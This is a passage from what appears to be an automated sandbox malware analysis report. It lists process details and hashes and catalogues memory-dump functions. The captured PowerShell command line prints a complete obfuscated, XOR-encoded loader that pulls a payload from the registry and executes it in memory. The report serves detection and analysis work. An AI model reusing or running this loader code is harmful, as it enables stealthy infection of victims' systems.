-eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $talose1 ;}else{.$talose0 $talose1;}
      Imagebase:0x7ff6f4710000
      File size:447488 bytes
      MD5 hash:95000560239032BC68B4C2FDFCDEF913
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:.Net C# or VB.NET
      Reputation:high

      General

      Target ID:11
      Start time:15:30:39
      Start date:01/12/2022
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff6edaf0000
      File size:625664 bytes
      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Target ID:12
      Start time:15:30:44
      Start date:01/12/2022
      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):
      Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Smertensbarns0 { param([String]$Regionsplanlovs); $Delintervallernes = New-Object byte[] ($Regionsplanlovs.Length / 2); For($Klistringer=0; $Klistringer -lt $Regionsplanlovs.Length; $Klistringer+=2){ $Delintervallernes[$Klistringer/2] = [convert]::ToByte($Regionsplanlovs.Substring($Klistringer, 2), 16); $Delintervallernes[$Klistringer/2] = ($Delintervallernes[$Klistringer/2] -bxor 165); } [String][System.Text.Encoding]::ASCII.GetString($Delintervallernes);}$Forskningsresultaters0=Smertensbarns0 'F6DCD6D1C0C88BC1C9C9';$Forskningsresultaters1=Smertensbarns0 'E8CCC6D7CAD6CAC3D18BF2CCCB96978BF0CBD6C4C3C0EBC4D1CCD3C0E8C0D1CDCAC1D6';$Forskningsresultaters2=Smertensbarns0 'E2C0D1F5D7CAC6E4C1C1D7C0D6D6';$Forskningsresultaters3=Smertensbarns0 'F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3';$Forskningsresultaters4=Smertensbarns0 'D6D1D7CCCBC2';$Forskningsresultaters5=Smertensbarns0 'E2C0D1E8CAC1D0C9C0EDC4CBC1C9C0';$Forskningsresultaters6=Smertensbarns0 'F7F1F6D5C0C6CCC4C9EBC4C8C08985EDCCC1C0E7DCF6CCC28985F5D0C7C9CCC6';$Forskningsresultaters7=Smertensbarns0 'F7D0CBD1CCC8C08985E8C4CBC4C2C0C1';$Forskningsresultaters8=Smertensbarns0 'F7C0C3C9C0C6D1C0C1E1C0C9C0C2C4D1C0';$Forskningsresultaters9=Smertensbarns0 'ECCBE8C0C8CAD7DCE8CAC1D0C9C0';$Ghegish0=Smertensbarns0 'E8DCE1C0C9C0C2C4D1C0F1DCD5C0';$Ghegish1=Smertensbarns0 'E6C9C4D6D68985F5D0C7C9CCC68985F6C0C4C9C0C18985E4CBD6CCE6C9C4D6D68985E4D0D1CAE6C9C4D6D6';$Ghegish2=Smertensbarns0 'ECCBD3CACEC0';$Ghegish3=Smertensbarns0 'F5D0C7C9CCC68985EDCCC1C0E7DCF6CCC28985EBC0D2F6C9CAD18985F3CCD7D1D0C4C9';$Ghegish4=Smertensbarns0 'F3CCD7D1D0C4C9E4C9C9CAC6';$Ghegish5=Smertensbarns0 'CBD1C1C9C9';$Ghegish6=Smertensbarns0 'EBD1F5D7CAD1C0C6D1F3CCD7D1D0C4C9E8C0C8CAD7DC';$Ghegish7=Smertensbarns0 'ECE0FD';$Ghegish8=Smertensbarns0 'F9';function fkp {Param ($Upgrown, $Depressionsperioder) ;$Hoeres0 =Smertensbarns0 '81EED7C8C8C0D7C0CB8598858DFEE4D5D5E1CAC8C4CCCBF89F9FE6D0D7D7C0CBD1E1CAC8C4CCCB8BE2C0D1E4D6D6C0C8C7C9CCC0D68D8C85D985F2CDC0D7C088EAC7CFC0C6D185DE8581FA8BE2C9CAC7C4C9E4D6D6C0C8C7C9DCE6C4C6CDC08588E4CBC18581FA8BE9CAC6C4D1CCCACB8BF6D5C9CCD18D81E2CDC0C2CCD6CD9D8CFE8894F88BE0D4D0C4C9D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6958C85D88C8BE2C0D1F1DCD5C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6948C';&($Ghegish7) $Hoeres0;$Hoeres5 = Smertensbarns0 '81E6CDCCC9C985988581EED7C8C8C0D7C0CB8BE2C0D1E8C0D1CDCAC18D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6978985FEF1DCD5C0FEF8F885E58D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D696898581E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6918C8C';&($Ghegish7) $Hoeres5;$Hoeres1 = Smertensbarns0 'D7C0D1D0D7CB8581E6CDCCC9C98BECCBD3CACEC08D81CBD0C9C98985E58DFEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3F88DEBC0D288EAC7CFC0C6D185F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C38D8DEBC0D288EAC7CFC0C6D185ECCBD1F5D1D78C89858D81EED7C8C8C0D7C0CB8BE2C0D1E8C0D1CDCAC18D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6908C8C8BECCBD3CACEC08D81CBD0C9C98985E58D81F0D5C2D7CAD2CB8C8C8C8C898581E1C0D5D7C0D6D6CCCACBD6D5C0D7CCCAC1C0D78C8C';&($Ghegish7) $Hoeres1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Nondecorously,[Parameter(Position = 1)] [Type] $Coeliomyalgia = [Void]);$Hoeres2 = Smertensbarns0 '81EDC4DCCBC0D6859885FEE4D5D5E1CAC8C4CCCBF89F9FE6D0D7D7C0CBD1E1CAC8C4CCCB8BE1C0C3CCCBC0E1DCCBC4C8CCC6E4D6D6C0C8C7C9DC8D8DEBC0D288EAC7CFC0C6D185F6DCD6D1C0C88BF7C0C3C9C0C6D1CCCACB8BE4D6D6C0C8C7C9DCEBC4C8C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D69D8C8C8985FEF6DCD6D1C0C88BF7C0C3C9C0C6D1CCCACB8BE0C8CCD18BE4D6D6C0C8C7C9DCE7D0CCC9C1C0D7E4C6C6C0D6D6F89F9FF7D0CB8C8BE1C0C3CCCBC0E1DCCBC4C8CCC6E8CAC1D0C9C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D69C898581C3C4C9D6C08C8BE1C0C3CCCBC0F1DCD5C08D81E2CDC0C2CCD6CD95898581E2CDC0C2CCD6CD948985FEF6DCD6D1C0C88BE8D0C9D1CCC6C4D6D1E1C0C9C0C2C4D1C0F88C';&($Ghegish7) $Hoeres2;$Hoeres3 = Smertensbarns0 '81EDC4DCCBC0D68BE1C0C3CCCBC0E6CACBD6D1D7D0C6D1CAD78D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6938985FEF6DCD6D1C0C88BF7C0C3C9C0C6D1CCCACB8BE6C4C9C9CCCBC2E6CACBD3C0CBD1CCCACBD6F89F9FF6D1C4CBC1C4D7C1898581EBCACBC1C0C6CAD7CAD0D6C9DC8C8BF6C0D1ECC8D5C9C0C8C0CBD1C4D1CCCACBE3C9C4C2D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6928C';&($Ghegish7) $Hoeres3;$Hoeres4 = Smertensbarns0 '81EDC4DCCBC0D68BE1C0C3CCCBC0E8C0D1CDCAC18D81E2CDC0C2CCD6CD97898581E2CDC0C2CCD6CD96898581E6CAC0C9CCCAC8DCC4C9C2CCC4898581EBCACBC1C0C6CAD7CAD0D6C9DC8C8BF6C0D1ECC8D5C9C0C8C0CBD1C4D1CCCACBE3C9C4C2D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6928C';&($Ghegish7) $Hoeres4;$Hoeres5 = Smertensbarns0 'D7C0D1D0D7CB8581EDC4DCCBC0D68BE6D7C0C4D1C0F1DCD5C08D8C';&($Ghegish7) $Hoeres5 ;}$Uncouple = Smertensbarns0 'CEC0D7CBC0C99697';$Hoeres6 = Smertensbarns0 '81F2C0D7C0D7C4D1859885FEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BE8C4D7D6CDC4C9F89F9FE2C0D1E1C0C9C0C2C4D1C0E3CAD7E3D0CBC6D1CCCACBF5CACCCBD1C0D78D8DC3CED58581F0CBC6CAD0D5C9C08581E2CDC0C2CCD6CD918C89858DE2E1F185E58DFEECCBD1F5D1D7F88985FEF0ECCBD19697F88985FEF0ECCBD19697F88985FEF0ECCBD19697F88C858DFEECCBD1F5D1D7F88C8C8C';&($Ghegish7) $Hoeres6;$Dmningsprojekter = fkp $Ghegish5 $Ghegish6;$Hoeres7 = Smertensbarns0 '81F6D0CECEC0D7CAD3C0D7D1D7CECEC0D1D69685988581F2C0D7C0D7C4D18BECCBD3CACEC08DFEECCBD1F5D1D7F89F9FFFC0D7CA898596909C898595DD96959595898595DD91958C';&($Ghegish7) $Hoeres7;$Hoeres8 = Smertensbarns0 '81E6CAD7D7CAC7C7CAD7C0C085988581F2C0D7C0D7C4D18BECCBD3CACEC08DFEECCBD1F5D1D7F89F9FFFC0D7CA898595DD949595959595898595DD96959595898595DD918C';&($Ghegish7) $Hoeres8;$Cartwrighting=(Get-ItemProperty -Path 'HKCU:\Pseudambulacrum\konstitutionel').Bjfs;$Hoeres9 = Smertensbarns0 '81EDCAC0D7C0D6859885FEF6DCD6D1C0C88BE6CACBD3C0D7D1F89F9FE3D7CAC8E7C4D6C09391F6D1D7CCCBC28D81E6C4D7D1D2D7CCC2CDD1CCCBC28C';&($Ghegish7) $Hoeres9;$Cartwrighting0 = Smertensbarns0 'FEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BE8C4D7D6CDC4C9F89F9FE6CAD5DC8D81EDCAC0D7C0D689859589858581F6D0CECEC0D7CAD3C0D7D1D7CECEC0D1D696898596909C8C';&($Ghegish7) $Cartwrighting0;$Noncondiment2=$Hoeres.count-359;$Cartwrighting1 = Smertensbarns0 'FEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BE8C4D7D6CDC4C9F89F9FE6CAD5DC8D81EDCAC0D7C0D6898596909C898581E6CAD7D7CAC7C7CAD7C0C0898581EBCACBC6CACBC1CCC8C0CBD1978C';&($Ghegish7) $Cartwrighting1;$Cartwrighting2 = Smertensbarns0 '81CEC9C4D7C2CFCAD7C1C0859885FEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BE8C4D7D6CDC4C9F89F9FE2C0D1E1C0C9C0C2C4D1C0E3CAD7E3D0CBC6D1CCCACBF5CACCCBD1C0D78D81F6D0CECEC0D7CAD3C0D7D1D7CECEC0D1D69689858DE2E1F185E58DFEECCBD1F5D1D7F889FEECCBD1F5D1D7F88C858DFEF3CACCC1F88C8C8C';&($Ghegish7) $Cartwrighting2;$Cartwrighting3 = Smertensbarns0 '81CEC9C4D7C2CFCAD7C1C08BECCBD3CACEC08D81E6CAD7D7CAC7C7CAD7C0C08981E1C8CBCCCBC2D6D5D7CACFC0CED1C0D78C';&($Ghegish7) $Cartwrighting3#
      Imagebase:
      File size:430592 bytes
      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
      Has elevated privileges:
      Has administrator privileges:
      Programmed in:C, C++ or other language
      Reputation:high

      Disassembly

      Reset < >

        Executed Functions

        Function 00007FFDC3F81F95 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 0000000A.00000002.837800461.00007FFDC3F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC3F80000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_10_2_7ffdc3f80000_powershell.jbxd
        Similarity
        • API ID:
        • String ID: H
        • API String ID: 0-2852464175
        • Opcode ID: f92a6e1205717e573763fe159b58d574e5874dc3c3a4e5ff9c482703f9cfe873
        • Instruction ID: 4e71a6b79eb39548092d263af730632da52978068978823d04c312ebcfb9a497
        • Opcode Fuzzy Hash: f92a6e1205717e573763fe159b58d574e5874dc3c3a4e5ff9c482703f9cfe873
        • Instruction Fuzzy Hash: B2314F31A4894D8FDF58DF58C496EA977A1EF69304F540269D40DE7296CA34FC82CBC1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00007FFDC3F8309C Relevance: .1, Instructions: 98COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 0000000A.00000002.837800461.00007FFDC3F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC3F80000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_10_2_7ffdc3f80000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 1e7d6a072de34bbaaff62b38d6b2a733226b6a035f2dff741e975027b743b9ee
        • Instruction ID: eafa949083192f613bd45b711d884e9341cc11a7ffdd84255d8c25ea645a25e6
        • Opcode Fuzzy Hash: 1e7d6a072de34bbaaff62b38d6b2a733226b6a035f2dff741e975027b743b9ee
        • Instruction Fuzzy Hash: B4310D31A589098FDF58EF58D455EA977E1FF69704F14026AE40DE32A2CA74E881CBC1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00007FFDC3F82A45 Relevance: .1, Instructions: 98COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 0000000A.00000002.837800461.00007FFDC3F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC3F80000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_10_2_7ffdc3f80000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: cdcf8764a322b281c53bbf05cfe40922797f4013032afd8caaeb6c3861b977e6
        • Instruction ID: 2397dba0d2b19e80f6c26e4fbf16e27df08ef8cfdc3f199f265dac3b27c822bb
        • Opcode Fuzzy Hash: cdcf8764a322b281c53bbf05cfe40922797f4013032afd8caaeb6c3861b977e6
        • Instruction Fuzzy Hash: D0312D31A489498FDF98DF58D495EE877E1EF69300F140269D009E7296CA34FC82CBC1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00007FFDC3F81894 Relevance: .1, Instructions: 85COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 0000000A.00000002.837800461.00007FFDC3F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC3F80000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_10_2_7ffdc3f80000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 8dd53f9a1ddc8eb0cc3b6ec4ceff4b2939d13624ba02a2ea1f64d31cfd665310
        • Instruction ID: bf3466a2d20055810c5ec0a99e7ac0080a8a9ece645241c16265f437e07690ab
        • Opcode Fuzzy Hash: 8dd53f9a1ddc8eb0cc3b6ec4ceff4b2939d13624ba02a2ea1f64d31cfd665310
        • Instruction Fuzzy Hash: 4721B83065CB494FD749DF18D451AB977E1FF96314F100A7DE48AC71A2DB3AA442C742
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00007FFDC3F81FAF Relevance: .1, Instructions: 80COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 0000000A.00000002.837800461.00007FFDC3F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC3F80000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_10_2_7ffdc3f80000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 3fcb4194891fcdad62c40dc35cd24e534d7d8d7f080c9622463c87e7ad558e07
        • Instruction ID: fa5d1c095962e12e0f5eda92e1cbca9e9cffa5ee8afebf28ccef4d331bd97740
        • Opcode Fuzzy Hash: 3fcb4194891fcdad62c40dc35cd24e534d7d8d7f080c9622463c87e7ad558e07
        • Instruction Fuzzy Hash: 7B211931A5890D8FDF98EF58C891EA977A1FF69300F140269D409E7296CA34EC82CBC1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00007FFDC3F82DAC Relevance: .0, Instructions: 49COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 0000000A.00000002.837800461.00007FFDC3F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC3F80000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_10_2_7ffdc3f80000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 02cf21928c013803dab6ebd2ddf2a6f5be9b40e332533d811b4212378ab789e6
        • Instruction ID: 8591487c80931048cea29925fdabbc49f21a0dee50f3cbe420356af2723ea45a
        • Opcode Fuzzy Hash: 02cf21928c013803dab6ebd2ddf2a6f5be9b40e332533d811b4212378ab789e6
        • Instruction Fuzzy Hash: 06F0683275CB484FD75CDA0CE8569B573D1EB99330B50063EE08BC76D6E926B8438786
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00007FFDC3F8277E Relevance: .0, Instructions: 47COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 0000000A.00000002.837800461.00007FFDC3F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC3F80000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_10_2_7ffdc3f80000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 168a563e3e72e3e137278e1496e380de01e5469e48df172f8b6e5a799a01dcfb
        • Instruction ID: 3a1c93a95c3fd88a3bea4533c0cbb3b14b04024bdf7656bba039285b64d055f2
        • Opcode Fuzzy Hash: 168a563e3e72e3e137278e1496e380de01e5469e48df172f8b6e5a799a01dcfb
        • Instruction Fuzzy Hash: 1EF05B3175C6094FD75C990CE8529B573D1E799220B50057EE48FC2697E926BC438685
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00007FFDC3F82DBD Relevance: .0, Instructions: 44COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 0000000A.00000002.837800461.00007FFDC3F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC3F80000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_10_2_7ffdc3f80000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: ad153c7288becfc093e05c6a72342307fd0faaf36352196447290e81e22bba06
        • Instruction ID: b5d4e569d157bbd92021dc1f39aa6425a4a309231ea2c9fbc5c1c07bab20de8d
        • Opcode Fuzzy Hash: ad153c7288becfc093e05c6a72342307fd0faaf36352196447290e81e22bba06
        • Instruction Fuzzy Hash: 01F0307275CB444FDB589A0CE8429B573D1E795334B50016EE48A866A7EA22E8428646
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00007FFDC3F82792 Relevance: .0, Instructions: 41COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 0000000A.00000002.837800461.00007FFDC3F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC3F80000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_10_2_7ffdc3f80000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 80127636182f98b2983aa155fcfd914a41dda19b50991c577279b3c0cba65345
        • Instruction ID: b870ed290cae32b05c4d78eee56f26ac6f90f9551bf95b00c0c9abe7040a5210
        • Opcode Fuzzy Hash: 80127636182f98b2983aa155fcfd914a41dda19b50991c577279b3c0cba65345
        • Instruction Fuzzy Hash: C7F0303276C6084F970C9A0CF8439F573D1E799234B40016EE48AC2656E816F8838A85
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00007FFDC3F82777 Relevance: .0, Instructions: 39COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 0000000A.00000002.837800461.00007FFDC3F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC3F80000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_10_2_7ffdc3f80000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 10a94b45a68a7086cd8006a953cbadd491238ba73713aac3df7f403d20b171bd
        • Instruction ID: a0f104c7088530f1de0851fd4a4a1fee31841eb19bf42ee097686ba039c0112f
        • Opcode Fuzzy Hash: 10a94b45a68a7086cd8006a953cbadd491238ba73713aac3df7f403d20b171bd
        • Instruction Fuzzy Hash: 17E092327ADA490EA70C561CBC035F573C1D746235780027EE48AC6657E807B843828A
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00007FFDC3F82DA5 Relevance: .0, Instructions: 39COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 0000000A.00000002.837800461.00007FFDC3F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC3F80000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_10_2_7ffdc3f80000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: b02636c20e475d56e2ce110e8edafb0e81a8612bf6745978d83a1342523fae5b
        • Instruction ID: c7f09273f03ec4f8dc57e64a8564fbc841aa08923ab5af27dfcbda4610f96f0c
        • Opcode Fuzzy Hash: b02636c20e475d56e2ce110e8edafb0e81a8612bf6745978d83a1342523fae5b
        • Instruction Fuzzy Hash: 49F0A032B5CA491FEB1CAA0CFC429B573C1D796334B50027EE08AC72A7E812B8474786
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        Function 00007FFDC3F80EFD Relevance: .4, Instructions: 377COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 0000000A.00000002.837800461.00007FFDC3F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC3F80000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_10_2_7ffdc3f80000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: c1187c8cbe1f8ea5274786cc62e29e4dae82d4e77d183ad7ad4d1173ee026234
        • Instruction ID: c09dab8cc80195dbe596f9763e7c088a10f1786d0add27339a2510d21f2f3daa
        • Opcode Fuzzy Hash: c1187c8cbe1f8ea5274786cc62e29e4dae82d4e77d183ad7ad4d1173ee026234
        • Instruction Fuzzy Hash: 7EB1F86BF8D1965FE7126A2CB8A50D67F60EF5333170906F7D0C89B463FD18648E82A1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00007FFDC3F811AB Relevance: .1, Instructions: 123COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 0000000A.00000002.837800461.00007FFDC3F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC3F80000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_10_2_7ffdc3f80000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 5c847210ffc480a568caf7898f052cbb9a401eb29dcac7e6d87ea4a62e59d5a3
        • Instruction ID: 805f31e3596b3e28eb06df7f09ead44269eef7b0a271ebcc9e53aa8c81ffdebb
        • Opcode Fuzzy Hash: 5c847210ffc480a568caf7898f052cbb9a401eb29dcac7e6d87ea4a62e59d5a3
        • Instruction Fuzzy Hash: E731F96FF880655EDA11772DF8510DABF60EF9133271000BBD5CD9A873FA1854CE86A4
        Uniqueness

        Uniqueness Score: -1.00%